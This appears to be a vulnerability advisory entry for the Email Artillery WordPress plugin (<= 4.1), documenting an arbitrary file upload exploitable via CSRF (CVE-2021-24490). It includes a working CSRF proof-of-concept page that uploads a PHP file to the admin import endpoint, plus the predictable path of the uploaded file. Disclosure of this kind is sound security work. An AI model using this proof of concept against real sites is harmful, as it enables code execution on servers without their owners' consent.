WordPress Plugin Vulnerabilities

Email Artillery <= 4.1 - Arbitrary File Upload

Description

The plugin does not properly check the uploaded files from the Import Emails feature, allowing arbitrary files to be uploaded. Furthermore, the plugin is also lacking any CSRF check, allowing such issue to be exploited via a CSRF attack as well. However, due to the presence of a .htaccess, denying access to everything in the folder the file is uploaded to, the malicious uploaded file will only be accessible on Web Servers such as Nginx/IIS

Proof of Concept

Login in as admin and Import a PHP file via the Import Emails feature (/wp-admin/admin.php?page=etmbu-import-email-manual)

Via CSRF:

<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=etmbu-import-email-manual", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------362587018939873212313468279541");
        xhr.withCredentials = true;
        var body = "-----------------------------362587018939873212313468279541\r\n" + 
          "Content-Disposition: form-data; name=\"txt_file\"; filename=\"phpinfo.php\"\r\n" + 
          "Content-Type: text/php\r\n" + 
          "\r\n" + 
          "\x3c?php phpinfo() ?\x3e\n" + 
          "\r\n" + 
          "-----------------------------362587018939873212313468279541--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

https://example.com/wp-content/uploads/ea_uploads/28-06-2021-11-40-phpinfo.php (date is in the format date('d-m-Y-H-i-'))

Affects Plugins

Plugin icon
email-artillery
No known fix

References

CVE
CVE-2021-24490

Miscellaneous

Original Researcher
Jin Huang
Submitter
Jin Huang
Submitter twitter
JinHWhite412Ash
Verified
Yes
WPVDB ID
4ea0127e-afef-41bf-a005-c57432f9f58c

Timeline

Publicly Published
2021-08-16 (about 2 years ago)
Added
2021-08-16 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2014-08-01
Title
wp-catpro - Arbitrary File Upload
Published
2015-07-10
Title
Fast Image Adder <= 1.1 - Unauthenticated Remote File Upload
Published
2014-08-01
Title
e-Commerce <= 3.4 - Arbitrary File Upload Exploit
Published
2024-04-15
Title
Poll Maker <= 3.4 - Authenticated (Subscriber+) Arbitrary File Upload
Published
2014-08-01
Title
Saico - Arbitrary File Upload